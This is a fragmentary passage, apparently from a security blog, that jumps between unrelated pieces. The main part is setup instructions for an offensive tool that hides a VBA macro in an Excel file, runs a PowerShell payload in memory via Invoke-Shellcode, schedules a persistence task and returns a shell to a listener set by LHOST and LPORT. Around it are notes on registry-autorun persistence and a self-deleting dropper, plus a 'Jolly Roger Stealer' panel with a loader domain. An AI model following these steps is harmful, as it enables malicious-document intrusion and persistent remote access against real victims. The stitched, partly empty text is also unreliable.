It then pulls down a persistence script, drops it, and creates a registry autorun key for it. Once done, it also drops a self-deleting .bat file that removes the initial payload from the system.

Persistence using the registry

Thanks to enigma0x3 for this awesome method.

Update: New-Powershell-Payload-Excel-Delivery

This is a VBA macro that uses Matt Graeber's Invoke-Shellcode to execute a PowerShell payload in memory and also schedules a task for persistence (a 20-minute on-idle trigger, after which you get a shell back).
root@bt:~# git clone
root@bt:~# cd Powershell-Payload-Excel-Delivery/

Open the MacroCode file, change the download URL for the Invoke-Shellcode file, and change the LHOST and LPORT options. Now add the macro code to an Excel file and start up the listener.

Jolly Roger Stealer

My friend Kafeine has already done a post on it, although someone recently sent me a URL on my cybercrime tracker... I give a f%$k.
• dns: 1 ›› ip: - address: LOADER.ISTMEIN.DE

Bot statistic:
CPU "Arhitecture"


Search module:



Create task:

Task statistic:

I haven't looked at a sample because I don't have one, but it sounds very lame, like Plasma HTTP, which grabs everything without checking whether there is already a duplicate.